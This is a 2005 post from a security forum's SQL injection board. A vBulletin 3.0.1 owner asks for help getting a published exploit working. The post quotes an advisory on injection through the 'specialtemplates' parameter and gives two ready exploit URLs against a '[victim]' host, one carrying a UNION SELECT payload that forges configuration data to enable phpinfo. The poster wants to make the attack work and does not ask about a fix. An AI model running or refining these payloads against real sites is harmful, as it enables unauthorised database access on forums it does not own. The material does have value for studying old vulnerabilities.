|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 83
Members: 0
Total: 83
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vBulletin 3.0.1 Exploit (SQL Injection) |
|
Posted: Thu Mar 24, 2005 12:02 am |
|
|
Kaj |
Beginner |
|
|
Joined: Mar 24, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
Hi guys,
I own a vBulletin forum which is installed and currently at version 3.0.1 but there's an SQL exploit that has been documented on the web, and I can't afford to upgrade the forum by shelling out more money for a renewed license.
So I was hoping to learn how to inject SQL myself and see quite how easy it is to hack the forum.
This is an example, but I can't get it to work, can someone explain it a bit better to me thanks :
Description:
vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.
Manual Testing Notes:
An exploit example:
http://[victim]/forum/global.php?specialtemplates=al3ndaleeb')
http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb')
UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*
Thanks. |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|